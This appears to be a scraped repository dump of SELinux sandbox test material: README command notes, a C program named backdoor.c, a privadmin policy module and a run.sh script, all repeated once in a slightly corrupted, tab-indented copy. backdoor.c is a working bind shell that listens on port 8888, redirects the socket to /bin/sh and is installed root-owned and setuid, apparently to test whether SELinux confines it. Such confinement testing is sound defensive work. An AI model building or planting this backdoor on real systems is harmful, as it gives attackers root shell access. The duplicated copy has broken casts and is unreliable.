H0neyBadger/README.md

## README.md

      
    Raw
  

              README.md
            
          
    List policy
sesearch --allow -C --target=cifs_t --class=file --perm=create
sesearch --allow -C --target=cifs_t --class=dir --perm=remove_name

Compile
make -f /usr/share/selinux/devel/Makefile privadmin.pp
semodule -i privadmin.pp
ausearch -m avc -ts recent

log dontaudit policy
semodule --disable_dontaudit --build
semodule --build

Install
yum install selinux-policy-devel setools-console policycoreutils-python policycoreutils-newrole
yum install policycoreutils-sandbox selinux-policy-sandbox
yum install selinux-policy-mls

Config
ls -Z $(tty)
vim /etc/selinux/mls/contexts/securetty_types
vim /etc/selinux/mls/setrans.conf

Services
systemctl enable mcstransd
# vi /etc/selinux/targeted/setrans.conf
# systemctl disable abrtd

Run sandbox
sandbox -M -H "./sandbox/" -T "/tmp/" -t sandbox_net_t "./test"


## backdoor.c
/*
    source: http://www.binarytides.com/server-client-example-c-sockets-linux/
    C socket selinux test code

    mkdir ./demo
    gcc -o ./demo/backdoor backdoor.c
    sudo chown root:root ./demo/backdoor
    sudo chmod 6755 ./demo/backdoor
    sandbox -M -H "./demo" -T "./demo" -t sandbox_net_t "./demo/backdoor"

*/

#include<stdio.h>
#include<string.h>    //strlen
#include<sys/socket.h>
#include<arpa/inet.h> //inet_addr
#include<unistd.h>    //write

int main(int argc , char *argv[])
{
    int socket_desc , client_sock , c , read_size;
    struct sockaddr_in server , client;

    //Create socket
    socket_desc = socket(AF_INET , SOCK_STREAM , 0);
    if (socket_desc == -1)
    {
        printf("Could not create socket");
    }
    puts("Socket created");

    //Prepare the sockaddr_in structure
    server.sin_family = AF_INET;
    //listen localhost only
    server.sin_addr.s_addr = inet_addr("127.0.0.1");
    //server.sin_addr.s_addr = INADDR_ANY;
    server.sin_port = htons( 8888 );

    //Bind
    if( bind(socket_desc,(struct sockaddr *)&server , sizeof(server)) < 0)
    {
        //print the error message
        perror("bind failed. Error");
        return 1;
    }
    puts("bind done");

    //Listen
    listen(socket_desc , 3);

    //Accept and incoming connection
    puts("Waiting for incoming connections...");
    c = sizeof(struct sockaddr_in);

    //accept connection from an incoming client
    client_sock = accept(socket_desc, (struct sockaddr *)&client, (socklen_t*)&c);
    if (client_sock < 0)
    {
        perror("accept failed");
        return 1;
    }
    puts("Connection accepted");

    //setup uid gid
    setreuid(geteuid(), getuid());

    //backdoor code
    dup2(client_sock, 0);
    dup2(client_sock, 1);
    dup2(client_sock, 2);
    close(client_sock);
    // message printed to the nework session
    puts("Exec shell backdoor");
    int b=execv("/bin//sh", 0);

    return 0;
}

## privadmin.te
policy_module(privadmin, 1.7)


gen_require(`
  type sysadm_t;
  type unconfined_t;
  type mount_t;
')

type privadmin_t;
fs_associate(privadmin_t)

allow sysadm_t privadmin_t:{ dir file } relabelto;
allow unconfined_t privadmin_t:{ dir file } relabelto;
allow mount_t privadmin_t:filesystem { mount remount unmount getattr relabelfrom relabelto transition associate quotamod quotaget };
allow privadmin_t privadmin_t:filesystem { mount remount unmount getattr relabelfrom relabelto transition associate quotamod quotaget };
allow unconfined_t privadmin_t:dir { ioctl read write create getattr setattr lock unlink link rename add_name remove_name reparent search rmdir open };
allow unconfined_t privadmin_t:file { ioctl read write create getattr setattr lock append unlink link rename open } ;

## run.sh
#!/bin/bash
set -euxo pipefail

BACKDOOR="./backdoor"

mkdir -p ./sandbox/tmp
sudo gcc -o $BACKDOOR backdoor.c
sudo chown root:root ./backdoor
sudo chmod 4755 $BACKDOOR
sudo chcon -t sandbox_net_t $BACKDOOR
runcon -t sandbox_net_t $BACKDOOR

#sandbox -M -H "./sandbox" -T "./sandbox/tmp" -t sandbox_net_t "$BACKDOOR"
	/*
	source: http://www.binarytides.com/server-client-example-c-sockets-linux/
	C socket selinux test code

	mkdir ./demo
	gcc -o ./demo/backdoor backdoor.c
	sudo chown root:root ./demo/backdoor
	sudo chmod 6755 ./demo/backdoor
	sandbox -M -H "./demo" -T "./demo" -t sandbox_net_t "./demo/backdoor"

	*/

	#include<stdio.h>
	#include<string.h> //strlen
	#include<sys/socket.h>
	#include<arpa/inet.h> //inet_addr
	#include<unistd.h> //write

	int main(int argc , char *argv[])
	{
	int socket_desc , client_sock , c , read_size;
	struct sockaddr_in server , client;

	//Create socket
	socket_desc = socket(AF_INET , SOCK_STREAM , 0);
	if (socket_desc == -1)
	{
	printf("Could not create socket");
	}
	puts("Socket created");

	//Prepare the sockaddr_in structure
	server.sin_family = AF_INET;
	//listen localhost only
	server.sin_addr.s_addr = inet_addr("127.0.0.1");
	//server.sin_addr.s_addr = INADDR_ANY;
	server.sin_port = htons( 8888 );

	//Bind
	if( bind(socket_desc,(struct sockaddr *)&server , sizeof(server)) < 0)
	{
	//print the error message
	perror("bind failed. Error");
	return 1;
	}
	puts("bind done");

	//Listen
	listen(socket_desc , 3);

	//Accept and incoming connection
	puts("Waiting for incoming connections...");
	c = sizeof(struct sockaddr_in);

	//accept connection from an incoming client
	client_sock = accept(socket_desc, (struct sockaddr )&client, (socklen_t)&c);
	if (client_sock < 0)
	{
	perror("accept failed");
	return 1;
	}
	puts("Connection accepted");

	//setup uid gid
	setreuid(geteuid(), getuid());

	//backdoor code
	dup2(client_sock, 0);
	dup2(client_sock, 1);
	dup2(client_sock, 2);
	close(client_sock);
	// message printed to the nework session
	puts("Exec shell backdoor");
	int b=execv("/bin//sh", 0);

	return 0;
	}
	policy_module(privadmin, 1.7)


	gen_require(`
	type sysadm_t;
	type unconfined_t;
	type mount_t;
	')

	type privadmin_t;
	fs_associate(privadmin_t)

	allow sysadm_t privadmin_t:{ dir file } relabelto;
	allow unconfined_t privadmin_t:{ dir file } relabelto;
	allow mount_t privadmin_t:filesystem { mount remount unmount getattr relabelfrom relabelto transition associate quotamod quotaget };
	allow privadmin_t privadmin_t:filesystem { mount remount unmount getattr relabelfrom relabelto transition associate quotamod quotaget };
	allow unconfined_t privadmin_t:dir { ioctl read write create getattr setattr lock unlink link rename add_name remove_name reparent search rmdir open };
	allow unconfined_t privadmin_t:file { ioctl read write create getattr setattr lock append unlink link rename open } ;
	#!/bin/bash
	set -euxo pipefail

	BACKDOOR="./backdoor"

	mkdir -p ./sandbox/tmp
	sudo gcc -o $BACKDOOR backdoor.c
	sudo chown root:root ./backdoor
	sudo chmod 4755 $BACKDOOR
	sudo chcon -t sandbox_net_t $BACKDOOR
	runcon -t sandbox_net_t $BACKDOOR

	#sandbox -M -H "./sandbox" -T "./sandbox/tmp" -t sandbox_net_t "$BACKDOOR"